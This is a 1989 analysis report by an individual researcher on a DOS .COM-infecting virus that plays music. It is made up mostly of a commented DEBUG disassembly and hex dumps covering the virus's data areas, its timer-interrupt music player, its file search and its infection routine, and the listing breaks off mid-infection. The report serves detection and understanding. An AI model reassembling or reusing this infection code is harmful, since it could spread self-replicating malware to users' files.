mirror of
synced 2025-02-11 17:32:03 +00:00
1736 lines
88 KiB
1736 lines
88 KiB
-this report was compiled by thomas vogler, schaeferweg 25, 6107 reinheim,
west germaney. my phone number (voice) is +-49-6162-4349.
-first the most important conclusions:
1. a file that is infected, contains E9 at byte 1 and F1 at byte
offset 4. the size of the file is an integral multiple of 33 (51 (decimal)).
2. the virus infects only .COM files
3. the virus makes itself resident and plays some tunes after a while
-all numbers in this report are in HEX (base 16 (dec)), unless otherwise
-the two files compared have the following directory characteristics:
Volume in drive C has no label
TANK CO 8488 22.11.89 5.19
TANK1 CO 11271 22.11.89 5.19
2 File(s) 1650688 bytes free
the files were renamed from .com to .co to avoid unintended starting, all
numbers above are decimal, due to the dos directory command. the hexadecimal
sizes of the files are:
TANK.CO 2128
-the file tank1.co is the infected file.
-differences between the two files:
the virus starts at byte 2128 with the byte E9. the virus is somehow relocated
so that the byte at 2128 is originated to be at offset 100 within the code
segment during execution.
the infected file ends at 2c06 with the bytes 10 3c
thus the virus did append 2C06 - 2128 + 1 = ADF bytes
to the file.
-below is a disassembly of the virus, carried out with good old debug:
; here is the disassemly of the first 4 bytes of
; the infected file tank1.com
1CF5:0100 E92521 JMP 2228 ; jump to the first byte
; that was appended to
; the original file. the
; offset inside this
; instruction is needed
; later
1CF5:0103 F1 db f1 ; this byte is used as
; an additional marker
; during infection of
; other files.
; here the original code for the old program is
; located
db ? dup (?)
; this is the first byte, that was appended to the
; original file. here is the start of the virus, which
; should be treated as originated to 0100.
0100 E9DD08 JMP 2B08 ; jump to the main entry
00F8/2220 E9 DD 08 ...
0103 db 4 dup (?) ; save area for the
; original code in the
; com file (4 bytes)
00F8/2220 BC FC 19 89 ....
00F8/2220 14 .
0108/2230 00 01 18 17 ....
; save area for the original int21 vector
010C dw ?
010E dw ?
0108/2230 77 03 40 11 w.@.
; save area for the original int27 vector
0110 dw ?
0112 dw ?
0108/2230 08 09 40 11 ..@.
; save area for the old int20 vector
0114 dw ?
0116 dw ?
0108/2230 67 03 40 11 g.@.
0118/2240 00 00 00 00 ....
; here we store the original interrupt 8 (timer)
011C dw ?
011E dw ?
0118/2240 AA 00 77 0F- ..w.
; the following are dependent of order, since both are
; loaded with a lds instruction
0120 dw ? ; offset of dta
0122 dw ? ; segment of dta
0118/2240 8A 45 0A 9B .E..
; in the next section we find the disk transfer area
; the virus uses for search first/search next
; operations
0124 db 21 dup (?) ; reserved for dos
0139 db ? ; attributes of file
013A dw ? ; time of file
013C dw ? ; date of file
013E dw ? ; low size
0140 dw ? ; high size
0142 db 13 dup (?) ; packed name
0118/2240 03 3F 3F 3F .???
0128/2250 3F 3F 3F 3F 3F 43 4F 4D-20 20 00 39 00 01 49 10 ?????COM .9..I.
0138/2260 F6 20 63 2A 76 13 28 21-00 00 54 41 4E 4B 2E 43 . c*v.(!..TANK.C
0148/2270 4F 4D 00 4D 00 00 00 OM.M...
014F db 4 dup (?) ; buffer for first 4
; bytes of a file to
; become infected
0148/2270 E9 25 21 F1 .%!.
; this is a counter thats decremented during each
; timer interrupt. if it reaches 0, its reloaded
; with 2
0153 dw ?
0148/2270 14 00 ..
0155 DB '*.COM',0,'\'
0148/2270 2A 2E 43 *.C
0158/2280 4F 4D 00 5C OM.\
015C DB 75 DUP (?),'\'
0158/2280 43 3A 2A 2E-43 4F 4D 00 4F 4D 00 00 C:*.COM.OM..
0168/2290 52 53 45 5C 2A 2E 43 4F-4D 00 52 2E 49 4E 49 00 RSE\*.COM.R.INI.
0178/22A0 00 43 00 00 00 00 00 00-00 00 00 00 00 00 00 00 .C..............
0188/22B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0198/22C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 5C ...............\
01A8 DB 75 DUP (?),'\'
01A8/22D0 43 3A 2A 2E 43 4F 4D 00-00 49 56 45 52 53 45 5C C:*.COM..IVERSE\
01B8/22E0 2A 2E 43 4F 4D 00 43 4F-4D 00 00 00 00 00 00 00 *.COM.COM.......
01C8/22F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
01D8/2300 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
01E8/2310 00 00 00 00 00 00 00 00-00 00 00 5C ...........\
01F4 DB ?? DUP (?),'\'
01E8-2310 43 3A 54 41 C:TA
01F8/2320 4E 4B 2E 43 4F 4D 00 43-4F 4D 00 5C 56 49 50 54 NK.COM.COM.\VIPT
0208/2330 45 53 54 2E 43 4F 4D 00-4D 00 4F 4D 00 00 00 00 EST.COM.M.OM....
0218/2340 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0228/2350 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0238/2360 00 00 00 00 00 00 00 00-00 00 00 00 ............
0244 db 'COMMAND.COM',0
0238/2360 43 4F 4D 4D ............COMM
0248/2370 41 4E 44 2E 43 4F 4D 00 AND.COM.
-> at 0255 a table of notes seems to begin, at 0251 there seems to be
a pointer into this table. the table seems to be terminated by a
word of 0000. the table consists of 3 byte entrys, which colud be
something like tone and duration. the termination is at 2743.
0248/2370 01 .
0251 dw 0255 ; pointer to next note
0248/2370 55 02 U.
; this is a counter for how long the current tune
; should be played.
0253 dw ?
0248/2370 18 15 ..
; below is the table of tunes to be played when the
; effect is produced. the table is terminated by a
; frequency value of 0
tune macro freq, len
dw freq
db len
tune endm
0255 tune 07E4 ,06
tune 07E4 ,06
tune 08DA ,03
tune 0964 ,03
tune 0964 ,06
tune 09F4 ,03
tune 0964 ,03
tune 0964 ,10
tune 0024 ,02
tune 09F4 ,03
tune 0964 ,03
tune 0964 ,06
tune 09F4 ,03
tune 0964 ,03
tune 07E4 ,06
tune 0964 ,03
tune 07E4 ,03
tune 08DA ,0C
tune 0A8A ,06
tune 0024 ,03
tune 0A8A ,03
tune 0A8A ,06
tune 0B2C ,03
tune 0A8A ,03
tune 0A8A ,06
tune 0B2C ,03
tune 0A8A ,03
tune 08DA ,10
tune 0024 ,02
tune 0964 ,03
tune 0A8A ,03
tune 0964 ,03
tune 07E4 ,09
tune 0708 ,09
tune 0708 ,03
tune 0A8A ,10
tune 0024 ,02
tune 07E4 ,06
tune 07E4 ,06
tune 08DA ,03
tune 0964 ,03
tune 0964 ,06
tune 09F4 ,03
tune 0964 ,03
tune 0964 ,10
tune 0024 ,02
tune 09F4 ,03
tune 0964 ,03
tune 0964 ,06
tune 09F4 ,03
tune 0964 ,03
tune 08DA ,03
tune 0964 ,03
tune 0A8A ,05
tune 0C87 ,01
tune 0A8A ,0C
tune 0BD3 ,06
tune 0024 ,03
tune 0BD3 ,03
tune 0BD3 ,06
tune 0C87 ,03
tune 0BD3 ,03
tune 09F4 ,06
tune 0A8A ,03
tune 0BD3 ,03
tune 05E9 ,0F
tune 0024 ,03
tune 0BD3 ,03
tune 0A8A ,03
tune 0964 ,03
tune 07E4 ,01
tune 0024 ,02
tune 0BD3 ,03
tune 0A8A ,03
tune 0964 ,03
tune 07E4 ,01
tune 0024 ,02
tune 0FCF ,03
tune 0E16 ,05
tune 0964 ,01
tune 0A8A ,0C
tune 0BD3 ,01
tune 000A ,0F
tune 0FCF ,04
tune 0C87 ,04
tune 0A8A ,04
tune 0A8A ,04
tune 0024 ,04
tune 0545 ,02
tune 0024 ,02
tune 0545 ,02
tune 0024 ,06
tune 0643 ,02
tune 0024 ,02
tune 0643 ,02
tune 0024 ,06
tune 0FCF ,04
tune 0FCF ,04
tune 0C87 ,04
tune 0A8A ,04
tune 0A8A ,04
tune 0024 ,04
tune 0545 ,02
tune 0024 ,02
tune 0545 ,02
tune 0024 ,06
tune 05E9 ,02
tune 0024 ,02
tune 05E9 ,02
tune 0024 ,06
tune 10B8 ,04
tune 10B8 ,04
tune 0E16 ,04
tune 0964 ,04
tune 0964 ,04
tune 0024 ,04
tune 04B2 ,02
tune 0024 ,02
tune 04B2 ,02
tune 0024 ,06
tune 05E9 ,02
tune 0024 ,02
tune 05E9 ,02
tune 0024 ,06
tune 10B8 ,04
tune 10B8 ,04
tune 0E16 ,04
tune 0964 ,04
tune 0964 ,04
tune 0024 ,04
tune 04B2 ,02
tune 0024 ,02
tune 04B2 ,02
tune 0024 ,06
tune 0643 ,02
tune 0024 ,02
tune 0643 ,02
tune 0024 ,06
tune 0FCF ,04
tune 0FCF ,04
tune 0C87 ,04
tune 0A8A ,04
tune 07E4 ,04
tune 0024 ,04
tune 03F2 ,02
tune 0024 ,02
tune 03F2 ,02
tune 0024 ,06
tune 0545 ,02
tune 0024 ,02
tune 0545 ,02
tune 0024 ,06
tune 0FCF ,04
tune 0FCF ,04
tune 0C87 ,04
tune 0A8A ,04
tune 07E4 ,04
tune 0024 ,04
tune 03F2 ,02
tune 0024 ,02
tune 03F2 ,02
tune 0024 ,06
tune 04B2 ,02
tune 0024 ,02
tune 04B2 ,02
tune 0024 ,06
tune 0E16 ,04
tune 0E16 ,04
tune 0BD3 ,04
tune 0964 ,02
tune 0024 ,02
tune 0964 ,0E
tune 0024 ,02
tune 0B2C ,04
tune 0A8A ,04
tune 0643 ,10
tune 07E4 ,04
tune 0C87 ,04
tune 0C87 ,08
tune 0E16 ,04
tune 0964 ,08
tune 0A8A ,04
tune 0FCF ,04
tune 0024 ,02
tune 0FCF ,02
tune 0FCF ,04
tune 0024 ,08
tune 0A8A ,02
tune 0024 ,02
tune 0BD3 ,02
tune 0024 ,06
tune 0A8A ,02
tune 0024 ,02
tune 0BD3 ,02
tune 0024 ,06
tune 0A8A ,04
tune 0643 ,10
tune 0708 ,04
tune 0A8A ,02
tune 0024 ,02
tune 0C87 ,02
tune 0024 ,06
tune 0A8A ,02
tune 0024 ,02
tune 0C87 ,02
tune 0024 ,06
tune 0A8A ,04
tune 0708 ,10
tune 07E4 ,04
tune 0A8A ,02
tune 0024 ,02
tune 0BD3 ,02
tune 0024 ,06
tune 0A8A ,02
tune 0024 ,02
tune 0BD3 ,02
tune 0024 ,06
tune 0A8A ,04
tune 0643 ,10
tune 0708 ,04
tune 0A8A ,04
tune 07E4 ,04
tune 0708 ,04
tune 0643 ,04
tune 0545 ,08
tune 05E9 ,04
tune 0643 ,02
tune 0643 ,02
tune 0643 ,04
tune 0708 ,02
tune 0024 ,02
tune 07E4 ,04
tune 0024 ,08
tune 000A ,0F
tune 0773 ,02
tune 07E4 ,02
tune 07E4 ,04
tune 0773 ,02
tune 07E4 ,02
tune 07E4 ,04
tune 0773 ,02
tune 07E4 ,02
tune 07E4 ,04
tune 04F8 ,04
tune 0024 ,04
tune 04F8 ,02
tune 0545 ,02
tune 05E9 ,04
tune 05E9 ,02
tune 06A4 ,02
tune 0773 ,04
tune 0773 ,02
tune 07E4 ,02
tune 08DA ,04
tune 08DA ,04
tune 0024 ,04
tune 07E4 ,02
tune 08DA ,02
tune 08DA ,04
tune 07E4 ,02
tune 08DA ,02
tune 08DA ,04
tune 07E4 ,02
tune 08DA ,02
tune 08DA ,04
tune 0545 ,04
tune 0024 ,04
tune 0545 ,02
tune 05E9 ,02
tune 0643 ,04
tune 0643 ,02
tune 0773 ,02
tune 07E4 ,04
tune 07E4 ,02
tune 08DA ,02
tune 09F4 ,04
tune 09F4 ,04
tune 0024 ,04
tune 04F8 ,02
tune 0545 ,02
tune 0545 ,04
tune 046E ,04
tune 0643 ,04
tune 0545 ,04
tune 05E9 ,04
tune 07E4 ,04
tune 0024 ,04
tune 04F8 ,02
tune 0545 ,02
tune 0545 ,04
tune 046E ,04
tune 0643 ,04
tune 0545 ,04
tune 05E9 ,04
tune 04F8 ,04
tune 0545 ,02
tune 05E9 ,02
tune 06A4 ,02
tune 0773 ,02
tune 07E4 ,04
tune 0C87 ,04
tune 0BD3 ,04
tune 0A8A ,04
tune 09F4 ,04
tune 08DA ,02
tune 09F4 ,02
tune 0A8A ,04
tune 0BD3 ,04
tune 07E4 ,04
tune 0024 ,04
tune 042E ,08
tune 03F2 ,02
tune 0024 ,06
tune 042E ,08
tune 03F2 ,02
tune 0024 ,06
tune 042E ,08
tune 03F2 ,04
tune 042E ,04
tune 03F2 ,04
tune 042E ,04
tune 03F2 ,04
tune 0000 ,0F
0248/2370 E4 07 06 ...
0258/2380 E4 07 06 DA 08 03 64 09-03 64 09 06 F4 09 03 64 ......d..d.....d
0268/2390 09 03 64 09 10 24 00 02-F4 09 03 64 09 03 64 09 ..d..$.....d..d.
0278/23A0 06 F4 09 03 64 09 03 E4-07 06 64 09 03 E4 07 03 ....d.....d.....
0288/23B0 DA 08 0C 8A 0A 06 24 00-03 8A 0A 03 8A 0A 06 2C ......$........,
0298/23C0 0B 03 8A 0A 03 8A 0A 06-2C 0B 03 8A 0A 03 DA 08 ........,.......
02A8/23D0 10 24 00 02 64 09 03 8A-0A 03 64 09 03 E4 07 09 .$..d.....d.....
02B8/23E0 08 07 09 08 07 03 8A 0A-10 24 00 02 E4 07 06 E4 .........$......
02C8/23F0 07 06 DA 08 03 64 09 03-64 09 06 F4 09 03 64 09 .....d..d.....d.
02D8/2400 03 64 09 10 24 00 02 F4-09 03 64 09 03 64 09 06 .d..$.....d..d..
02E8/2410 F4 09 03 64 09 03 DA 08-03 64 09 03 8A 0A 05 87 ...d.....d......
02F8/2420 0C 01 8A 0A 0C D3 0B 06-24 00 03 D3 0B 03 D3 0B ........$.......
0308/2430 06 87 0C 03 D3 0B 03 F4-09 06 8A 0A 03 D3 0B 03 ................
0318/2440 E9 05 0F 24 00 03 D3 0B-03 8A 0A 03 64 09 03 E4 ...$........d...
0328/2450 07 01 24 00 02 D3 0B 03-8A 0A 03 64 09 03 E4 07 ..$........d....
0338/2460 01 24 00 02 CF 0F 03 16-0E 05 64 09 01 8A 0A 0C .$........d.....
0348/2470 D3 0B 01 0A 00 0F CF 0F-04 87 0C 04 8A 0A 04 8A ................
0358/2480 0A 04 24 00 04 45 05 02-24 00 02 45 05 02 24 00 ..$..E..$..E..$.
0368/2490 06 43 06 02 24 00 02 43-06 02 24 00 06 CF 0F 04 .C..$..C..$.....
0378/24A0 CF 0F 04 87 0C 04 8A 0A-04 8A 0A 04 24 00 04 45 ............$..E
0388/24B0 05 02 24 00 02 45 05 02-24 00 06 E9 05 02 24 00 ..$..E..$.....$.
0398/24C0 02 E9 05 02 24 00 06 B8-10 04 B8 10 04 16 0E 04 ....$...........
03A8/24D0 64 09 04 64 09 04 24 00-04 B2 04 02 24 00 02 B2 d..d..$.....$...
03B8/24E0 04 02 24 00 06 E9 05 02-24 00 02 E9 05 02 24 00 ..$.....$.....$.
03C8/24F0 06 B8 10 04 B8 10 04 16-0E 04 64 09 04 64 09 04 ..........d..d..
03D8/2500 24 00 04 B2 04 02 24 00-02 B2 04 02 24 00 06 43 $.....$.....$..C
03E8/2510 06 02 24 00 02 43 06 02-24 00 06 CF 0F 04 CF 0F ..$..C..$.......
03F8/2520 04 87 0C 04 8A 0A 04 E4-07 04 24 00 04 F2 03 02 ..........$.....
0408/2530 24 00 02 F2 03 02 24 00-06 45 05 02 24 00 02 45 $.....$..E..$..E
0418/2540 05 02 24 00 06 CF 0F 04-CF 0F 04 87 0C 04 8A 0A ..$.............
0428/2550 04 E4 07 04 24 00 04 F2-03 02 24 00 02 F2 03 02 ....$.....$.....
0438/2560 24 00 06 B2 04 02 24 00-02 B2 04 02 24 00 06 16 $.....$.....$...
0448/2570 0E 04 16 0E 04 D3 0B 04-64 09 02 24 00 02 64 09 ........d..$..d.
0458/2580 0E 24 00 02 2C 0B 04 8A-0A 04 43 06 10 E4 07 04 .$..,.....C.....
0468/2590 87 0C 04 87 0C 08 16 0E-04 64 09 08 8A 0A 04 CF .........d......
0478/25A0 0F 04 24 00 02 CF 0F 02-CF 0F 04 24 00 08 8A 0A ..$........$....
0488/25B0 02 24 00 02 D3 0B 02 24-00 06 8A 0A 02 24 00 02 .$.....$.....$..
0498/25C0 D3 0B 02 24 00 06 8A 0A-04 43 06 10 08 07 04 8A ...$.....C......
04A8/25D0 0A 02 24 00 02 87 0C 02-24 00 06 8A 0A 02 24 00 ..$.....$.....$.
04B8/25E0 02 87 0C 02 24 00 06 8A-0A 04 08 07 10 E4 07 04 ....$...........
04C8/25F0 8A 0A 02 24 00 02 D3 0B-02 24 00 06 8A 0A 02 24 ...$.....$.....$
04D8/2600 00 02 D3 0B 02 24 00 06-8A 0A 04 43 06 10 08 07 .....$.....C....
04E8/2610 04 8A 0A 04 E4 07 04 08-07 04 43 06 04 45 05 08 ..........C..E..
04F8/2620 E9 05 04 43 06 02 43 06-02 43 06 04 08 07 02 24 ...C..C..C.....$
0508/2630 00 02 E4 07 04 24 00 08-0A 00 0F 73 07 02 E4 07 .....$.....s....
0518/2640 02 E4 07 04 73 07 02 E4-07 02 E4 07 04 73 07 02 ....s........s..
0528/2650 E4 07 02 E4 07 04 F8 04-04 24 00 04 F8 04 02 45 .........$.....E
0538/2660 05 02 E9 05 04 E9 05 02-A4 06 02 73 07 04 73 07 ...........s..s.
0548/2670 02 E4 07 02 DA 08 04 DA-08 04 24 00 04 E4 07 02 ..........$.....
0558/2680 DA 08 02 DA 08 04 E4 07-02 DA 08 02 DA 08 04 E4 ................
0568/2690 07 02 DA 08 02 DA 08 04-45 05 04 24 00 04 45 05 ........E..$..E.
0578/26A0 02 E9 05 02 43 06 04 43-06 02 73 07 02 E4 07 04 ....C..C..s.....
0588/26B0 E4 07 02 DA 08 02 F4 09-04 F4 09 04 24 00 04 F8 ............$...
0598/26C0 04 02 45 05 02 45 05 04-6E 04 04 43 06 04 45 05 ..E..E..n..C..E.
05A8/26D0 04 E9 05 04 E4 07 04 24-00 04 F8 04 02 45 05 02 .......$.....E..
05B8/26E0 45 05 04 6E 04 04 43 06-04 45 05 04 E9 05 04 F8 E..n..C..E......
05C8/26F0 04 04 45 05 02 E9 05 02-A4 06 02 73 07 02 E4 07 ..E........s....
05D8/2700 04 87 0C 04 D3 0B 04 8A-0A 04 F4 09 04 DA 08 02 ................
05E8/2710 F4 09 02 8A 0A 04 D3 0B-04 E4 07 04 24 00 04 2E ............$...
05F8/2720 04 08 F2 03 02 24 00 06-2E 04 08 F2 03 02 24 00 .....$........$.
0608/2730 06 2E 04 08 F2 03 04 2E-04 04 F2 03 04 2E 04 04 ................
0618/2740 F2 03 04 00 00 0F ......
; this procedure gets called every second timer
; interrupt (ie approx each 36.4 msecs), when the
; playing of a tune was enabled.
1E72:2746 FF0E5302 DEC WORD PTR [0253] ; decrement counter of
; timer ticks
1E72:274A A15302 MOV AX,[0253]
1E72:274D 3D0100 CMP AX,0001
1E72:2750 7406 JZ 2758 ; turn off speaker. at
; the next tick, the
; next note will be
; played
1E72:2752 3D0000 CMP AX,0000
1E72:2755 740C JZ 2763 ; start to play the next
; note if we reach 0
1E72:2757 C3 RET ; no change, continue
; turn off speaker
1E72:2758 E461 IN AL,61
1E72:275A 8AE0 MOV AH,AL
1E72:275C 24FC AND AL,FC
1E72:275E EB00 JMP $+2
1E72:2760 E661 OUT 61,AL
1E72:2762 C3 RET
; first some new counter for
; [0253] is computed
1E72:2763 8B365102 MOV SI,[0251] ; make si point to the
; entry for the next
; tune to be played
1E72:2767 8306510203 ADD WORD PTR [0251],+03 ; point to the next tune
1E72:276C 8B1C MOV BX,[SI] ; get frequency
1E72:276E 8A4402 MOV AL,[SI+02] ; get duration
1E72:2771 98 CBW ; clear ah
1E72:2772 83FB0A CMP BX,+0A
1E72:2775 7702 JA 2779 ; if the frequency to
; be played is below
; or equal 0A we make
; a longer pause. this
; is done by swapping
; the high and low parts
; of the ax register
1E72:2777 86C4 XCHG AL,AH
1E72:2779 A35302 MOV [0253],AX ; store new counter
1E72:277C 83FB00 CMP BX,+00 ; play a tune
1E72:277F 7508 JNZ 2789
; when we come here, the table terminated. we
; set up the pointer at 0251 to point again to the
; beginning of the table and we turn of the speaker.
1E72:2781 C70651025502 MOV WORD PTR [0251],0255
1E72:2787 EBCF JMP 2758 ; turn off speaker
; now start playing a tone with a frequency given by
; the bx register
1E72:2789 B0B6 MOV AL,B6
1E72:278B E643 OUT 43,AL
1E72:278D 8BC3 MOV AX,BX
1E72:278F E642 OUT 42,AL
1E72:2791 EB00 JMP $+2
1E72:2793 8AC4 MOV AL,AH
1E72:2795 E642 OUT 42,AL
; enable the speaker
1E72:2797 E461 IN AL,61
1E72:2799 8AE0 MOV AH,AL
1E72:279B 0C03 OR AL,03
1E72:279D EB00 JMP $+2
1E72:279F E661 OUT 61,AL
1E72:27A1 C3 RET
; this is the interposer for the timer interrupt
1E72:27A2 9C PUSHF
1E72:27A3 50 PUSH AX
1E72:27A4 53 PUSH BX
1E72:27A5 51 PUSH CX
1E72:27A6 52 PUSH DX
1E72:27A7 56 PUSH SI
1E72:27A8 57 PUSH DI
1E72:27A9 55 PUSH BP
1E72:27AA 1E PUSH DS
1E72:27AB 06 PUSH ES
1E72:27AC 9C PUSHF
1E72:27AD 2E CS:
1E72:27AE FF1E1C01 CALL FAR [011C] ; call original routine
1E72:27B2 FB STI
1E72:27B3 8CC8 MOV AX,CS
1E72:27B5 8ED8 MOV DS,AX ; addressability
1E72:27B7 833E530100 CMP WORD PTR [0153],+00
1E72:27BC 740F JZ 27CD ; not playing currently
1E72:27BE FF0E5301 DEC WORD PTR [0153]
1E72:27C2 7509 JNZ 27CD ; not the second tick
1E72:27C4 E87FFF CALL 2746 ; one tick advanced
1E72:27C7 C70653010200 MOV WORD PTR [0153],0002 ; and restart the next
; time
1E72:27CD 07 POP ES
1E72:27CE 1F POP DS
1E72:27CF 5D POP BP
1E72:27D0 5F POP DI
1E72:27D1 5E POP SI
1E72:27D2 5A POP DX
1E72:27D3 59 POP CX
1E72:27D4 5B POP BX
1E72:27D5 58 POP AX
1E72:27D6 9D POPF
1E72:27D7 CF IRET
; when we come here, we should start up an effect.
; this is done by initialising pointers and flags to
; get the music via the timer interrupt playing.
1E72:27D8 8CC8 MOV AX,CS
1E72:27DA 8ED8 MOV DS,AX
1E72:27DC FE060701 INC BYTE PTR [0107] ; ?count number of times
; an effect was
; produced?
1E72:27E0 C606500200 MOV BYTE PTR [0250],00 ; ??
1E72:27E5 C70653011400 MOV WORD PTR [0153],0014 ; start playing
1E72:27EB C70651025502 MOV WORD PTR [0251],0255 ; set pointer to the
; next note
1E72:27F1 C70653021815 MOV WORD PTR [0253],1518 ; before we start
; playing, wait about
; 2*1518 timer ticks.
; this is about 32 (dec)
; minutes.
1E72:27F7 C3 RET
; routine to copy an asciiz string
1E72:27F8 AC LODSB
1E72:27F9 AA STOSB
1E72:27FA 3C00 CMP AL,00
1E72:27FC 75FA JNZ strcpy
1E72:27FE C3 RET
; routine to compare asciiz strings given by si and
; di. return z for equal, nz for different.
1E72:2800 3A05 CMP AL,[DI]
1E72:2802 7507 JNZ 280B
1E72:2804 3C00 CMP AL,00
1E72:2806 7403 JZ 280B
1E72:2808 47 INC DI
1E72:2809 EBF4 JMP strcmp
1E72:280B C3 RET
1E72:280C FC CLD
1E72:280D 8CC8 MOV AX,CS
1E72:280F 8EC0 MOV ES,AX
1E72:2811 8BF2 MOV SI,DX
1E72:2813 8A04 MOV AL,[SI]
1E72:2815 3C00 CMP AL,00
1E72:2817 7507 JNZ 2820
1E72:2819 B419 MOV AH,19
1E72:281B E8E202 CALL int21 ; get current disk
1E72:281E FEC0 INC AL
1E72:2820 0440 ADD AL,40 ; now al is the drive
; letter
1E72:2822 2E CS:
1E72:2823 A25C01 MOV [015C],AL ; store drive letter
1E72:2826 2E CS:
1E72:2827 C6065D013A MOV BYTE PTR [015D],':' ; store colon
1E72:282C 2E CS:
1E72:282D C6065E0100 MOV BYTE PTR [015E],00 ; terminate string
1E72:2832 EB0D JMP 2841
; the next section is called for some dos functions
; dealing with asciiz filenames
1E72:2834 FC CLD
1E72:2835 8CC8 MOV AX,CS
1E72:2837 8EC0 MOV ES,AX
1E72:2839 8BF2 MOV SI,DX
1E72:283B BF5C01 MOV DI,015C
1E72:283E E8B7FF CALL strcpy
; this is a direct entry to ???
1E72:2841 8CC8 MOV AX,CS
1E72:2843 8ED8 MOV DS,AX
1E72:2845 BF5C01 MOV DI,015C ; start of string
1E72:2848 B000 MOV AL,00
1E72:284A B94B00 MOV CX,004B ; maximum length
1E72:284D F2 REPNZ
1E72:284E AE SCASB ; now di points to the
; 00 byte terminating
; the string
; in the next sectio the point where we can append
; *.COM to the string is located.
1E72:284F 8A45FF MOV AL,[DI-01]
1E72:2852 3C3A CMP AL,':'
1E72:2854 7407 JZ 285D
1E72:2856 3C5C CMP AL,'\'
1E72:2858 7403 JZ 285D
1E72:285A 4F DEC DI
1E72:285B EBF2 JMP 284F
; when we come here, di points to the first byte
; after the last directory separator of after the
; drive separator.
1E72:285D BE5501 MOV SI,0155
1E72:2860 E895FF CALL strcpy
; test if the current name was already searched for.
; if so, terminate the search operation
1E72:2863 BE5C01 MOV SI,015C
1E72:2866 BFA801 MOV DI,01A8
1E72:2869 E893FF CALL strcmp
1E72:286C 7501 JNZ 286F
1E72:286E C3 RET
; remember current search pattern
1E72:286F BE5C01 MOV SI,015C
1E72:2872 BFA801 MOV DI,01A8
1E72:2875 E880FF CALL strcpy
1E72:2878 BE5C01 MOV SI,015C
1E72:287B BFF401 MOV DI,01F4
1E72:287E E877FF CALL strcpy
; get current disk transfer address and store it
1E72:2881 06 PUSH ES
1E72:2882 B42F MOV AH,2F
1E72:2884 E87902 CALL int21
1E72:2887 891E2001 MOV [0120],BX
1E72:288B 8C062201 MOV [0122],ES
1E72:288F 07 POP ES
; set private disk transfer address
1E72:2890 B41A MOV AH,1A
1E72:2892 BA2401 MOV DX,0124
1E72:2895 E86802 CALL int21
1E72:2898 E81400 CALL 28AF
; restore original disk transfer address and return
1E72:289B 1E PUSH DS
1E72:289C B41A MOV AH,1A
1E72:289E C5162001 LDS DX,[0120]
1E72:28A2 E85B02 CALL int21
1E72:28A5 1F POP DS
1E72:28A6 C3 RET
; search the next file, because we found one, we dont
; like
1E72:28A7 B44F MOV AH,4F
1E72:28A9 E85402 CALL int21
1E72:28AC 730E JNB 28BC ; if ok continue,
; otherwise return
1E72:28AE C3 RET
; the following is called with 015c containing the
; search pattern, which is copied to 01a8 and 01f4
; too.
1E72:28AF B44E MOV AH,4E
1E72:28B1 BA5C01 MOV DX,015C
1E72:28B4 B92000 MOV CX,0020
1E72:28B7 E84602 CALL int21 ; find match file
1E72:28BA 72F2 JB 28AE ; return on error
; find first/next was ok. test if we want this file
1E72:28BC BE4201 MOV SI,0142
1E72:28BF BF4402 MOV DI,0244
1E72:28C2 E83AFF CALL strcmp
1E72:28C5 74E0 JZ 28A7 ; dont like COMMAND.COM
1E72:28C7 833E400100 CMP WORD PTR [0140],+00
1E72:28CC 75D9 JNZ 28A7 ; dont like files with
; high size != 0
1E72:28CE 813E3E011DF2 CMP WORD PTR [013E],F21D
1E72:28D4 77D1 JA 28A7 ; dont like files bigger
; than f21d bytes. this
; is de3 bytes less than
; 10000. this could be
; the size of
; the virus plus some
; reserve.
1E72:28D6 BA0000 MOV DX,0000
1E72:28D9 A13E01 MOV AX,[013E]
1E72:28DC BB3300 MOV BX,0033
1E72:28DF F7F3 DIV BX
1E72:28E1 83FA00 CMP DX,+00
1E72:28E4 74C1 JZ 28A7 ; dont like files whose
; size is divideable by
; 33 (51 dec) without a
; reminder.
; now we construct a name of a file using the search
; pattern given in 01F4.
1E72:28E6 BFF401 MOV DI,01F4
1E72:28E9 B000 MOV AL,00
1E72:28EB B94B00 MOV CX,004B
1E72:28EE F2 REPNZ
; now di points to the 00 byte at the end of the
; string. scan backwards until the last path or a
; drive separator is found.
1E72:28F0 8A45FF MOV AL,[DI-01]
1E72:28F3 3C3A CMP AL,':'
1E72:28F5 7407 JZ 28FE
1E72:28F7 3C5C CMP AL,'\'
1E72:28F9 7403 JZ 28FE
1E72:28FB 4F DEC DI
1E72:28FC EBF2 JMP 28F0
; now append the name of the found file
1E72:28FE BE4201 MOV SI,0142
1E72:2901 E8F4FE CALL strcpy
1E72:2904 B8023D MOV AX,3D02
1E72:2907 BAF401 MOV DX,01F4
1E72:290A E8F301 CALL int21 ; open file for rw
1E72:290D 729F JB 28AE ; return on error
; read the first 4 bytes of the file.
1E72:290F 8BD8 MOV BX,AX
1E72:2911 B43F MOV AH,3F
1E72:2913 BA4F01 MOV DX,014F
1E72:2916 B90400 MOV CX,0004
1E72:2919 E8E401 CALL int21
1E72:291C 7303 JNB 2921
1E72:291E E9C000 JMP 29E1 ; error while reading
; the file header
; occured. stop
; infection after
; resetting the files
; attributes
1E72:2921 803E4F01FF CMP BYTE PTR [014F],FF
1E72:2926 740E JZ 2936 ; files starting with
; FF dont become
; infected
1E72:2928 803E4F01E9 CMP BYTE PTR [014F],E9
1E72:292D 7510 JNZ 293F ; files not starting
; with E9 become
; infected
1E72:292F 803E5201F1 CMP BYTE PTR [0152],F1
1E72:2934 7509 JNZ 293F ; files without F1 in
; byte 4 become
; infected
1E72:2936 E8A800 CALL 29E1 ; close the file and
; retain its attributes
1E72:2939 A2A801 MOV [01A8],AL ; put in drive letter
; again...
1E72:293C E968FF JMP 28A7 ; search next file
; when we come here, we are going to infect a file
1E72:293F A14F01 MOV AX,[014F] ; copy the 4 bytes for
; the header
1E72:2942 A30301 MOV [0103],AX
1E72:2945 A15101 MOV AX,[0151]
1E72:2948 A30501 MOV [0105],AX
1E72:294B A13E01 MOV AX,[013E]
1E72:294E 2D0300 SUB AX,0003
1E72:2951 C6064F01E9 MOV BYTE PTR [014F],E9 ; store jmp instruction
1E72:2956 A35001 MOV [0150],AX
1E72:2959 C6065201F1 MOV BYTE PTR [0152],F1 ; store magic byte
1E72:295E B80042 MOV AX,4200
1E72:2961 B90000 MOV CX,0000
